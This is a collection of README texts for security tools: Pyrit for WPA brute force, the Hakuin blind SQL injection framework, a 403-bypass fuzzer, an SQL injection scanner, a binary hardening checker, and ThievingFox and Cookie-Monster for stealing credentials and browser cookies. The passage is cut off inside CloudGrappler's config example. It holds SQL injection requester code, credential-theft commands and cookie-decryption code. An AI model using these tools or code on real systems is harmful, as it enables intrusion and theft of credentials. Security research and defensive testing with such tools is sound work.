WPA/WPA2-PSK is a subset of IEEE 802.11 WPA/WPA2 that skips the complex task of key distribution and client authentication by assigning every participating party the same pre-shared key. This master key is derived from a password which the administrating user has to pre-configure, e.g. on his laptop and the Access Point. When the laptop creates a connection to the Access Point, a new session key is derived from the master key to encrypt and authenticate following traffic. The "shortcut" of using a single master key instead of per-user keys eases deployment of WPA/WPA2-protected networks for home and small-office use, at the cost of making the protocol vulnerable to brute-force attacks against its key negotiation phase; it allows to ultimately reveal the password that protects the network. This vulnerability has to be considered exceptionally disastrous, as the protocol allows much of the key derivation to be pre-computed, making simple brute-force attacks even more alluring to the attacker. For more background see this article on the project's blog (Outdated).
The author does not encourage or support using Pyrit for the infringement of peoples' communication privacy. The exploration and realization of the technology discussed here are a purpose of their own; this is documented by the open development, strictly source-code-based distribution and 'copyleft' licensing.
Pyrit is free software - free as in freedom. Everyone can inspect, copy or modify it and share derived work under the GNU General Public License v3+. It compiles and executes on a wide variety of platforms, including FreeBSD, MacOS X and Linux as operating systems, and x86, alpha, arm, hppa, mips, powerpc, s390 and sparc processors.
Attacking WPA/WPA2 by brute force boils down to computing Pairwise Master Keys as fast as possible. Every Pairwise Master Key is 'worth' exactly one megabyte of data getting pushed through PBKDF2-HMAC-SHA1. In turn, computing 10,000 PMKs per second is equivalent to hashing 9.8 gigabytes of data with SHA1 in one second.
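For context, the pre-computable step is the standard WPA/WPA2 key derivation: 4096 rounds of PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID, producing a 32-byte PMK. A single candidate PMK can be computed with nothing more than the Python standard library (a worked example, not Pyrit's optimized code):

```python
import hashlib

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Derive the WPA/WPA2-PSK Pairwise Master Key from a candidate passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

print(wpa2_pmk("password123", "MyHomeWiFi").hex())
```

Pre-computing and storing these PMKs per SSID is exactly the space-time trade-off the databases mentioned above implement.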
Multiple computational nodes can access a single storage server in various ways provided by Pyrit.
See CHANGELOG file for a better description.
Pyrit compiles and runs fine on Linux, MacOS X and BSD. I don't care about Windows; drop me a line (read: patch) if you make Pyrit work without copying half of GNU ... A guide for installing Pyrit on your system can be found in the wiki. There is also a Tutorial and a reference manual for the commandline-client.
You may want to read this wiki entry if you are interested in porting Pyrit to a new hardware platform. For contributions or bug reports, please submit an issue (https://github.com/JPaulMora/Pyrit/issues).
Hakuin is a Blind SQL Injection (BSQLI) optimization and automation framework written in Python 3. It abstracts away the inference logic and allows users to easily and efficiently extract databases (DB) from vulnerable web applications. To speed up the process, Hakuin utilizes a variety of optimization methods, including pre-trained and adaptive language models, opportunistic guessing, parallelism and more.
Hakuin has been presented at esteemed academic and industrial conferences:
- BlackHat MEA, Riyadh, 2023
- Hack in the Box, Phuket, 2023
- IEEE S&P Workshop on Offensive Technology (WOOT), 2023
More information can be found in our paper and slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from Requester and override the request method. The method must determine whether the query resolved to True or False.
import aiohttp
from hakuin import Requester

class StatusRequester(Requester):
    async def request(self, ctx, query):
        # Inject the query and treat HTTP 200 as "condition true".
        url = f'http://vuln.com/?n=XXX" OR ({query}) --'
        async with aiohttp.ClientSession() as session:
            async with session.get(url) as r:
                return r.status == 200

class ContentRequester(Requester):
    async def request(self, ctx, query):
        # Inject via a header and look for a marker string in the body.
        headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
        async with aiohttp.ClientSession() as session:
            async with session.get('http://vuln.com/', headers=headers) as r:
                return 'found' in await r.text()
To start extracting data, use the Extractor class. It requires a DBMS object to construct queries and a Requester object to inject them. Hakuin currently supports SQLite, MySQL, PSQL (PostgreSQL), and MSSQL (SQL Server) DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.
import asyncio
from hakuin import Extractor, Requester
from hakuin.dbms import SQLite, MySQL, PSQL, MSSQL

class StatusRequester(Requester):
    ...

async def main():
    # requester: Use this Requester
    # dbms:      Use this DBMS
    # n_tasks:   Spawns N tasks that extract column rows in parallel
    ext = Extractor(requester=StatusRequester(), dbms=SQLite(), n_tasks=1)
    ...

if __name__ == '__main__':
    asyncio.get_event_loop().run_until_complete(main())
Now that everything is set, you can start extracting DB metadata.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained model
schema_names = await ext.extract_schema_names(strategy='model')
tables = await ext.extract_table_names(strategy='model')
columns = await ext.extract_column_names(table='users', strategy='model')
metadata = await ext.extract_meta(strategy='model')
Once you know the structure, you can extract the actual content.
# text_strategy: Use this strategy if the column is text
res = await ext.extract_column(table='users', column='address', text_strategy='dynamic')
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = await ext.extract_column_text(table='users', column='address', strategy='dynamic')
res = await ext.extract_column_int(table='users', column='id')
res = await ext.extract_column_float(table='products', column='price')
res = await ext.extract_column_blob(table='users', column='id')
More examples can be found in the tests directory.
Hakuin comes with a simple wrapper tool, hk.py, that allows you to use Hakuin's basic functionality directly from the command line. To find out more, run:
python3 hk.py -h
This repository is actively developed to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}
The original 403fuzzer.py :)
Fuzz 401/403ing endpoints for bypasses
This tool performs various checks via headers, path normalization, verbs, etc. to attempt to bypass ACLs or URL validation.
It will output the response codes and length for each request, in a nicely organized, color-coded way so things are readable.
I implemented a "Smart Filter" that lets you mute responses that look the same after a certain number of times.
You can now feed it raw HTTP requests that you save to a file from Burp.
usage: bypassfuzzer.py -h
Simply paste the request into a file and run the script!
- It will parse and use cookies & headers from the request.
- Easiest way to authenticate for your requests.
python3 bypassfuzzer.py -r request.txt
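For reference, splitting a Burp-saved raw request into its parts boils down to something like the following. This is a simplified sketch, not bypassfuzzer's actual parser:

```python
def parse_raw_request(path: str):
    """Split a raw HTTP request saved from Burp into method, URL, headers, body."""
    with open(path, "r", encoding="utf-8", errors="replace") as f:
        raw = f.read().replace("\r\n", "\n")
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, url, _version = request_line.split()
    headers = {}
    for line in header_lines:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip()] = value.strip()
    return method, url, headers, body

print(parse_raw_request("request.txt"))
```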
Specify a URL
python3 bypassfuzzer.py -u http://example.com/test1/test2/test3/forbidden.html
Specify cookies to use in requests:
some examples:
--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"
Specify a method/verb and body data to send
bypassfuzzer.py -u https://example.com/forbidden -m POST -d "param1=blah&param2=blah2"
bypassfuzzer.py -u https://example.com/forbidden -m PUT -d "param1=blah&param2=blah2"
Specify custom headers to use with every request. Maybe you need to add some kind of auth header like Authorization: bearer <token>. Specify -H "header: value" for each additional header you'd like to add:
bypassfuzzer.py -u https://example.com/forbidden -H "Some-Header: blah" -H "Authorization: Bearer 1234567"
Based on response code and length: if the fuzzer sees the same response 8 times or more, it will automatically mute it. The repeat threshold is currently only changeable in the code, until an option is added to specify it via a flag.
NOTE: Can't be used simultaneously with -hc or -hl (yet).
# toggle smart filter on
bypassfuzzer.py -u https://example.com/forbidden --smart
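The smart filter idea boils down to counting (status code, response length) pairs and going quiet once a pair has been seen the configured number of times. A minimal sketch of that idea follows; the threshold of 8 comes from the description above, everything else is illustrative rather than the tool's code:

```python
from collections import Counter

class SmartFilter:
    """Mute responses once the same (status, length) pair has been seen N times."""

    def __init__(self, threshold: int = 8):
        self.threshold = threshold
        self.seen = Counter()

    def should_print(self, status: int, length: int) -> bool:
        key = (status, length)
        self.seen[key] += 1
        return self.seen[key] <= self.threshold

f = SmartFilter()
for status, length in [(403, 638)] * 10 + [(200, 1024)]:
    if f.should_print(status, length):
        print(status, length)   # the 9th and 10th 403/638 responses are muted
```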
Useful if you wanna proxy through Burp
bypassfuzzer.py -u https://example.com/forbidden --proxy http://127.0.0.1:8080
# skip sending headers payloads
bypassfuzzer.py -u https://example.com/forbidden -sh
bypassfuzzer.py -u https://example.com/forbidden --skip-headers
# Skip sending path normalization payloads
bypassfuzzer.py -u https://example.com/forbidden -su
bypassfuzzer.py -u https://example.com/forbidden --skip-urls
Provide comma delimited lists without spaces. Examples:
# Hide response codes
bypassfuzzer.py -u https://example.com/forbidden -hc 403,404,400
# Hide response lengths of 638
bypassfuzzer.py -u https://example.com/forbidden -hl 638
SQLMC (SQL Injection Massive Checker) is a tool designed to scan a domain for SQL injection vulnerabilities. It crawls the given URL up to a specified depth, checks each link for SQL injection vulnerabilities, and reports its findings.
pip3 install sqlmc
Run sqlmc with the following command-line arguments:
-u, --url: The URL to scan (required)
-d, --depth: The depth to scan (required)
-o, --output: The output file to save the results

Example usage:
sqlmc -u http://example.com -d 2
Replace http://example.com with the URL you want to scan and 2 with the desired depth of the scan. You can also specify an output file using the -o or --output flag followed by the desired filename.
The tool will then perform the scan and display the results.
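A very rough illustration of the kind of check involved is an error-based heuristic: append a quote to a parameterized URL and look for database error strings in the response. SQLMC's actual detection logic is not shown here and may well differ; only test systems you are authorized to scan.

```python
import requests

# Illustrative error-string heuristic only.
SQL_ERRORS = (
    "you have an error in your sql syntax",
    "unclosed quotation mark",
    "sqlite3.operationalerror",
)

def looks_injectable(url: str) -> bool:
    """Append a single quote and look for database error strings in the body."""
    resp = requests.get(url + "'", timeout=10)
    body = resp.text.lower()
    return any(err in body for err in SQL_ERRORS)

print(looks_injectable("http://example.com/item.php?id=1"))
```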
This project is licensed under the GNU Affero General Public License v3.0.
HardeningMeter is an open-source Python tool carefully designed to comprehensively assess the security hardening of binaries and systems. Its robust capabilities include thorough checks of various binary exploitation protection mechanisms, including Stack Canary, RELRO, randomizations (ASLR, PIC, PIE), None Exec Stack, Fortify, ASAN, and the NX bit. This tool is suitable for all types of binaries and provides accurate information about the hardening status of each binary, identifying those that deserve attention and those with robust security measures. HardeningMeter supports all Linux distributions and machine-readable output; the results can be printed to the screen in a table format or exported to a CSV file. (For more information see the Documentation.md file.)
Scan the '/usr/bin' directory, the '/usr/sbin/newusers' file, the system and export the results to a csv file.
python3 HardeningMeter.py -f /bin/cp -s
Before installing HardeningMeter, make sure your machine has the following:
1. The readelf and file commands
2. Python version 3
3. pip
4. tabulate
pip install tabulate
The very latest developments can be obtained via git.
Clone or download the project files (no compilation nor installation is required)
git clone https://github.com/OfriOuzan/HardeningMeter
Specify the files you want to scan; the argument can take more than one file, separated by spaces.
Specify the directory you want to scan; the argument takes one directory and scans all ELF files in it recursively.
Specify whether you want to add external checks (False by default).
Prints, in order, only those files that are missing security hardening mechanisms and need extra attention.
Specify if you want to scan the system hardening methods.
Specify if you want to save the results to csv file (results are printed as a table to stdout by default).
HardeningMeter's results are printed as a table and consist of 3 different states:
- (X) - This state indicates that the binary hardening mechanism is disabled.
- (V) - This state indicates that the binary hardening mechanism is enabled.
- (-) - This state indicates that the binary hardening mechanism is not relevant in this particular case.
When the default language on Linux is not English, make sure to add "LC_ALL=C" before calling the script.
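Two of the mechanisms listed above (stack canary and RELRO) can be approximated by parsing readelf output, which is also why LC_ALL=C matters: the parsing relies on English readelf output. The sketch below shows the idea only and is not HardeningMeter's implementation.

```python
import os
import subprocess

def check_binary(path: str) -> dict:
    """Rough stack-canary and RELRO checks via readelf (illustrative heuristics)."""
    env = {**os.environ, "LC_ALL": "C"}

    def readelf(flag: str) -> str:
        return subprocess.run(["readelf", "-W", flag, path],
                              capture_output=True, text=True, env=env).stdout

    symbols = readelf("-s")   # symbol table
    headers = readelf("-l")   # program headers
    dynamic = readelf("-d")   # dynamic section
    return {
        "stack_canary": "__stack_chk_fail" in symbols,
        "partial_relro": "GNU_RELRO" in headers,
        "full_relro": "GNU_RELRO" in headers and "BIND_NOW" in dynamic,
    }

print(check_binary("/bin/cp"))
```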
ThievingFox is a collection of post-exploitation tools to gather credentials from various password managers and Windows utilities. Each module leverages a specific method of injecting into the target process, and then hooks internal functions to gather credentials.
The accompanying blog post can be found here
Rustup must be installed, follow the instructions available here : https://rustup.rs/
The mingw-w64 package must be installed. On Debian, this can be done using :
apt install mingw-w64
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-gnu
rustup target add i686-pc-windows-gnu
Mono and Nuget must also be installed, instructions are available here : https://www.mono-project.com/download/stable/#download-lin
After adding Mono repositories, Nuget can be installed using apt :
apt install nuget
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
Rustup must be installed, follow the instructions available here : https://rustup.rs/
Both x86 and x86_64 windows targets must be installed for Rust:
rustup target add x86_64-pc-windows-msvc
rustup target add i686-pc-windows-msvc
.NET development environment must also be installed. From Visual Studio, navigate to Tools > Get Tools And Features > Install ".NET desktop development"
Finally, Python dependencies must be installed:
pip install -r client/requirements.txt
ThievingFox works with Python >= 3.11.
NOTE: On a Windows host, in order to use the KeePass module, msbuild must be available in the PATH. This can be achieved by running the client from within a Visual Studio Developer PowerShell (Tools > Command Line > Developer PowerShell).
All modules have been tested on the following Windows versions :
| Windows Version |
|---|
| Windows Server 2022 |
| Windows Server 2019 |
| Windows Server 2016 |
| Windows Server 2012R2 |
| Windows 10 |
| Windows 11 |
[!CAUTION] Modules have not been tested on other versions, and are expected not to work.
| Application | Injection Method |
|---|---|
| KeePass.exe | AppDomainManager Injection |
| KeePassXC.exe | DLL Proxying |
| LogonUI.exe (Windows Login Screen) | COM Hijacking |
| consent.exe (Windows UAC Popup) | COM Hijacking |
| mstsc.exe (Windows default RDP client) | COM Hijacking |
| RDCMan.exe (Sysinternals' RDP client) | COM Hijacking |
| MobaXTerm.exe (3rd party RDP client) | COM Hijacking |
[!CAUTION] Although I tried to ensure that these tools do not impact the stability of the targeted applications, inline hooking and library injection are unsafe and this might result in a crash, or the application being unstable. If that were the case, using the cleanup module on the target should be enough to ensure that the next time the application is launched, no injection/hooking is performed.
ThievingFox contains 3 main modules: poison, cleanup and collect.
For each application specified in the command line parameters, the poison module retrieves the original library that is going to be hijacked (for COM hijacking and DLL proxying), compiles a library that matches the properties of the original DLL, uploads it to the server, and modifies the registry if needed to perform COM hijacking. To speed up the compilation of all libraries, a cache is maintained in client/cache/.
--mstsc, --rdcman, and --mobaxterm have a specific option, respectively --mstsc-poison-hkcr, --rdcman-poison-hkcr, and --mobaxterm-poison-hkcr. If one of these options is specified, the COM hijacking will replace the registry key in the HKCR hive, meaning all users will be impacted. By default, only currently logged-in users are impacted (all users that have an HKCU hive).
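To see why a per-user registration takes precedence for logged-in users, a small read-only inspection sketch on a Windows host can compare the two locations. The CLSID below is a placeholder for illustration only, not one used by ThievingFox, and this code only reads the registry:

```python
import winreg

# Placeholder CLSID; substitute the class you want to inspect.
CLSID = "{00000000-0000-0000-0000-000000000000}"

def inproc_server(hive, subkey: str, label: str) -> None:
    """Print the default InprocServer32 value registered under the given hive."""
    try:
        with winreg.OpenKey(hive, subkey) as key:
            value, _ = winreg.QueryValueEx(key, "")
        print(f"{label}: {value}")
    except FileNotFoundError:
        print(f"{label}: not registered")

# Per-user registrations (HKCU\Software\Classes) shadow the merged HKCR view.
inproc_server(winreg.HKEY_CURRENT_USER, rf"Software\Classes\CLSID\{CLSID}\InprocServer32", "HKCU")
inproc_server(winreg.HKEY_CLASSES_ROOT, rf"CLSID\{CLSID}\InprocServer32", "HKCR")
```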
--keepass and --keepassxc have specific options, --keepass-path, --keepass-share, and --keepassxc-path, --keepassxc-share, to specify where these applications are installed, if it's not the default installation path. This is not required for other applications, since COM hijacking is used.
The KeePass module requires the Visual C++ Redistributable to be installed on the target.
Multiple applications can be specified at once, or the --all flag can be used to target all applications.
[!IMPORTANT] Remember to clean the cache if you ever change the --tempdir parameter, since the directory name is embedded inside native DLLs.
$ python3 client/ThievingFox.py poison -h
usage: ThievingFox.py poison [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-path KEEPASS_PATH]
[--keepass-share KEEPASS_SHARE] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--mstsc-poison-hkcr]
[--consent] [--logonui] [--rdcman] [--rdcman-poison-hkcr] [--mobaxterm] [--mobaxterm-poison-hkcr] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to poison KeePass.exe
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepassxc Try to poison KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to poison mstsc.exe
--mstsc-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for mstsc, which will also work for user that are currently not
logged in (Default: False)
--consent Try to poison Consent.exe
--logonui Try to poison LogonUI.exe
--rdcman Try to poison RDCMan.exe
--rdcman-poison-hkcr Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for RDCMan, which will also work for user that are currently not
logged in (Default: False)
--mobaxterm Try to poison MobaXTerm.exe
--mobaxterm-poison-hkcr
Instead of poisonning all currently logged in users' HKCU hives, poison the HKCR hive for MobaXTerm, which will also work for user that are currently not
logged in (Default: False)
--all Try to poison all applications
For each application specified in the command line parameters, the cleanup module first removes poisoning artifacts that force the target application to load the hooking library. Then, it tries to delete the libraries that were uploaded to the remote host.
For applications that support poisoning of both HKCU and HKCR hives, both are cleaned up regardless.
Multiple applications can be specified at once, or the --all flag can be used to clean up all applications.
It does not clean extracted credentials on the remote host.
[!IMPORTANT] If the targeted application is in use while the cleanup module is run, the DLLs that were dropped on the target cannot be deleted. Nonetheless, the cleanup module will revert the configuration that enables the injection, which should ensure that the next time the application is launched, no injection is performed. Files that cannot be deleted by ThievingFox are logged.
$ python3 client/ThievingFox.py cleanup -h
usage: ThievingFox.py cleanup [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepass-share KEEPASS_SHARE]
[--keepass-path KEEPASS_PATH] [--keepassxc] [--keepassxc-path KEEPASSXC_PATH] [--keepassxc-share KEEPASSXC_SHARE] [--mstsc] [--consent] [--logonui]
[--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Try to cleanup all poisonning artifacts related to KeePass.exe
--keepass-share KEEPASS_SHARE
The share on which KeePass is installed (Default: c$)
--keepass-path KEEPASS_PATH
The path where KeePass is installed, without the share name (Default: /Program Files/KeePass Password Safe 2/)
--keepassxc Try to cleanup all poisonning artifacts related to KeePassXC.exe
--keepassxc-path KEEPASSXC_PATH
The path where KeePassXC is installed, without the share name (Default: /Program Files/KeePassXC/)
--keepassxc-share KEEPASSXC_SHARE
The share on which KeePassXC is installed (Default: c$)
--mstsc Try to cleanup all poisonning artifacts related to mstsc.exe
--consent Try to cleanup all poisonning artifacts related to Consent.exe
--logonui Try to cleanup all poisonning artifacts related to LogonUI.exe
--rdcman Try to cleanup all poisonning artifacts related to RDCMan.exe
--mobaxterm Try to cleanup all poisonning artifacts related to MobaXTerm.exe
--all Try to cleanup all poisonning artifacts related to all applications
For each application specified on the command line parameters, the collect module retrieves the output files stored on the remote host inside C:\Windows\Temp\<tempdir> corresponding to the application, and decrypts them. The files are deleted from the remote host, and the retrieved data is stored in client/output/.
Multiple applications can be specified at once, or, the --all
flag can be used to collect logs from all applications.
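For example (hypothetical target and credentials), collecting and decrypting the logs of every supported application from a host could look like:
python3 client/ThievingFox.py collect DOMAIN/user:Password123@192.168.1.10 --all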
$ python3 client/ThievingFox.py collect -h
usage: ThievingFox.py collect [-h] [-hashes HASHES] [-aesKey AESKEY] [-k] [-dc-ip DC_IP] [-no-pass] [--tempdir TEMPDIR] [--keepass] [--keepassxc] [--mstsc] [--consent]
[--logonui] [--rdcman] [--mobaxterm] [--all]
target
positional arguments:
target Target machine or range [domain/]username[:password]@<IP or FQDN>[/CIDR]
options:
-h, --help show this help message and exit
-hashes HASHES, --hashes HASHES
LM:NT hash
-aesKey AESKEY, --aesKey AESKEY
AES key to use for Kerberos Authentication
-k Use kerberos authentication. For LogonUI, mstsc and consent modules, an anonymous NTLM authentication is performed, to retrieve the OS version.
-dc-ip DC_IP, --dc-ip DC_IP
IP Address of the domain controller
-no-pass, --no-pass Do not prompt for password
--tempdir TEMPDIR The name of the temporary directory to use for DLLs and output (Default: ThievingFox)
--keepass Collect KeePass.exe logs
--keepassxc Collect KeePassXC.exe logs
--mstsc Collect mstsc.exe logs
--consent Collect Consent.exe logs
--logonui Collect LogonUI.exe logs
--rdcman Collect RDCMan.exe logs
--mobaxterm Collect MobaXTerm.exe logs
--all Collect logs from all applications
Information on Web Application Security
sudo apt install python3 python3-pip
pip3 install termcolor
pip3 install google
pip3 install optioncomplete
pip3 install bs4
pip3 install prettytable
git clone https://github.com/Matrix07ksa/HackerInfo/
cd HackerInfo
chmod +x HackerInfo
./HackerInfo -h
python3 HackerInfo.py -d www.facebook.com -f pdf
[+] <-- Running Domain_filter_File ....-->
[+] <-- Searching [www.facebook.com] Files [pdf] ....-->
https://www.facebook.com/gms_hub/share/dcvsda_wf.pdf
https://www.facebook.com/gms_hub/share/facebook_groups_for_pages.pdf
https://www.facebook.com/gms_hub/share/videorequirementschart.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_hi_in.pdf
https://www.facebook.com/gms_hub/share/bidding-strategy_decision-tree_en_us.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_es_la.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ar.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_ur_pk.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_it_it.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pl_pl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_nl.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_pt_br.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_id_id.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_fr_fr.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_tr_tr.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_hi_in.pdf
https://www.facebook.com/rsrc.php/yA/r/AVye1Rrg376.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_ur_pk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_nl_nl.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_de_de.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_de_de.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_cs_cz.pdf
https://www.facebook.com/gms_hub/share/fundraise-on-facebook_sk_sk.pdf
https://www.facebook.com/gms_hub/share/creative-best-practices_japanese_jp.pdf
#####################[Finshid]########################
sudo python setup.py install
pip3 install hackinfo
Steal browser cookies for Edge, Chrome, and Firefox through a BOF or exe! Cookie-Monster will extract the WebKit master key, locate a browser process with a handle to the Cookies and Login Data files, copy the handle(s), and then filelessly download the target files. Once the Cookies/Login Data file(s) are downloaded, the Python decryption script can help extract those secrets! The Firefox module will parse profiles.ini, locate the logins.json and key4.db files, and download them. A separate GitHub repo is referenced for offline decryption.
Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID <pid> || --chromeLoginDataPID <PID> || --edgeCookiePID <pid> || --edgeLoginDataPID <pid>]
cookie-monster Example:
cookie-monster --chrome
cookie-monster --edge
cookie-monster --firefox
cookie-monster --chromeCookiePID 1337
cookie-monster --chromeLoginDataPID 1337
cookie-monster --edgeCookiePID 4444
cookie-monster --edgeLoginDataPID 4444
cookie-monster Options:
--chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD
--firefox, looks for profiles.ini and locates the key4.db and logins.json file
--chromeCookiePID, if the chrome.exe process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--chromeLoginDataPID, if the chrome.exe process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file
--edgeCookiePID, if the msedge.exe process with a handle to the Cookies file is already known, specify its PID to duplicate the handle and download the file
--edgeLoginDataPID, if the msedge.exe process with a handle to the Login Data file is already known, specify its PID to duplicate the handle and download the file
Cookie Monster Example:
cookie-monster.exe --all
Cookie Monster Options:
-h, --help Show this help message and exit
--all Run chrome, edge, and firefox methods
--edge Extract edge keys and download Cookies/Login Data file to PWD
--chrome Extract chrome keys and download Cookies/Login Data file to PWD
--firefox Locate firefox key and Cookies, does not make a copy of either file
Install requirements
pip3 install -r requirements.txt
Base64 encode the webkit masterkey
python3 base64-encode.py "\xec\xfc...."
Decrypt Chrome/Edge Cookies File
python .\decrypt.py "XHh..." --cookies ChromeCookie.db
Results Example:
-----------------------------------
Host: .github.com
Path: /
Name: dotcom_user
Cookie: KingOfTheNOPs
Expires: Oct 28 2024 21:25:22
Host: github.com
Path: /
Name: user_session
Cookie: x123.....
Expires: Nov 11 2023 21:25:22
Decrypt Chrome/Edge Passwords File
python .\decrypt.py "XHh..." --passwords ChromePasswords.db
Results Example:
-----------------------------------
URL: https://test.com/
Username: tester
Password: McTesty
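For context, the decryption the helper script performs on Chromium-based browsers generally follows the AES-GCM scheme sketched below. This is a minimal illustration of the technique, not the repository's decrypt.py; the column names come from the standard Chrome Cookies database, and the key/file arguments are placeholders.
# usage sketch: python3 decrypt_sketch.py <base64_webkit_master_key> ChromeCookie.db
import base64, sqlite3, sys
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

def decrypt_value(encrypted, master_key):
    # "v10" value layout: 3-byte prefix | 12-byte GCM nonce | ciphertext + 16-byte tag
    nonce, payload = encrypted[3:15], encrypted[15:]
    return AESGCM(master_key).decrypt(nonce, payload, None).decode("utf-8", "replace")

master_key = base64.b64decode(sys.argv[1])   # base64 WebKit master key recovered by the BOF
con = sqlite3.connect(sys.argv[2])           # path to the downloaded Cookies database
for host, name, value in con.execute("SELECT host_key, name, encrypted_value FROM cookies"):
    print(host, name, decrypt_value(value, master_key))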
Decrypt Firefox Cookies and Stored Credentials:
https://github.com/lclevy/firepwd
Ensure Mingw-w64 and make are installed on Linux prior to compiling.
make
To compile the exe on Windows:
gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32
This project could not have been done without the help of Mr-Un1k0d3r and his amazing seasonal videos! Highly recommend checking out his lessons!!!
Cookie Webkit Master Key Extractor: https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
Fileless download: https://github.com/fortra/nanodump
Decrypt Cookies and Login Data: https://github.com/login-securite/DonPAPI
Permiso: https://permiso.io
Read our release blog: https://permiso.io/blog/cloudgrappler-a-powerful-open-source-threat-detection-tool-for-cloud-environments
CloudGrappler is a purpose-built tool designed for effortless querying of high-fidelity and single-event detections related to well-known threat actors in popular cloud environments such as AWS and Azure.
To optimize your utilization of CloudGrappler, we recommend using shorter time ranges when querying for results. This approach enhances efficiency and accelerates the retrieval of information, ensuring a more seamless experience with the tool.
pip3 install -r requirements.txt
To clone the cloudgrep repository locally, run the clone.sh file. Alternatively, you can manually clone the repository into the same directory where CloudGrappler was cloned.
chmod +x clone.sh
./clone.sh
This tool offers a CLI (Command Line Interface). As such, here we review its use:
Define the scanning scope inside data_sources.json file based on your cloud infrastructure configuration. The following example showcases a structured data_sources.json file for both AWS and Azure environments:
Modifying the source inside the queries.json file to a wildcard character (*) will scan the corresponding query across both AWS and Azure environments.
{
"AWS": [
{
"bucket": "cloudtrail-logs-00000000-ffffff",
"prefix": [
"testTrails/AWSLogs/00000000/CloudTrail/eu-east-1/2024/03/03",
